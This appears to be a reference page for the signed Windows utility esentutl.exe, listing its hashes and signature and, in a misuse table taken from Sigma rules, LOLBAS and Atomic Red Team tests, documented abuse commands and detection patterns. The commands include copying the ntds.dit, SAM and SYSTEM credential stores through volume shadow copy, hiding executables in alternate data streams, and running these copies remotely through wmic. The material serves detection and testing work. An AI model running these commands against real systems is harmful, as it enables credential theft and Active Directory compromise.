esentutl.exe

  • File Path: C:\Windows\SysWOW64\esentutl.exe
  • Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)

Hashes

Type Hash
MD5 74CEBAE6659A507EC5511E88E40F0D3B
SHA1 532B65F6B4C017B0DC7E4E58C5D905767BD13027
SHA256 055C27CFC7D045461AE3968178E886CF02BDB518599AAC5908C254E2E92704DC
SHA384 A8796CA2E2CF68CDAA5EAD6ACE89329B505F39B0015AC6F5AB60948F879D4A5AF2E99CB645287B11BC482D6A94BDB189
SHA512 71A6BEF673BE1B76F36BD437DE7BEACC0132D18928A7606A116C825CAA69E8DAB950FFF3C0AB55E57246B962CB57CEFBF51E2BD2FA6CF30F584F291DAD2ADD89
SSDEEP 6144:7YORl2G0B7Fl3cw0iea3j/2HnjKuQTUd+K0t0fE:8OmG053cw00aDKuQTUd+K0t0fE

Runtime Data

Child Processes:

conhost.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: esentutl.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.2999 (rs1_release_inmarket.190520-1518)
  • Product Version: 10.0.14393.2999
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of esentutl.exe being misused. While esentutl.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\esentutl.exe' DRL 1.0
sigma win_susp_esentutl_activity.yml title: Suspicious Esentutl Use DRL 1.0
sigma win_susp_esentutl_activity.yml description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\ntds.dit* DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SAM DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SYSTEM DRL 1.0
sigma proc_creation_win_alternate_data_streams.yml - 'esentutl ' DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - Image\|endswith: '\esentutl.exe' DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml title: Esentutl Steals Browser Information DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml Image\|endswith: \esentutl.exe DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml title: Esentutl Gather Credentials DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml - 'esentutl' DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml title: Esentutl Volume Shadow Copy Service Keys DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml Image\|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter DRL 1.0
LOLBAS Esentutl.yml Name: Esentutl.exe  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit  
LOLBAS Esentutl.yml - Path: C:\Windows\System32\esentutl.exe  
LOLBAS Esentutl.yml - Path: C:\Windows\SysWOW64\esentutl.exe  
LOLBAS Esentutl.yml - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/  
atomic-red-team index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md - Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ## Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md Copy the SAM hive using the esentutl.exe utility MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md - Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md ## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.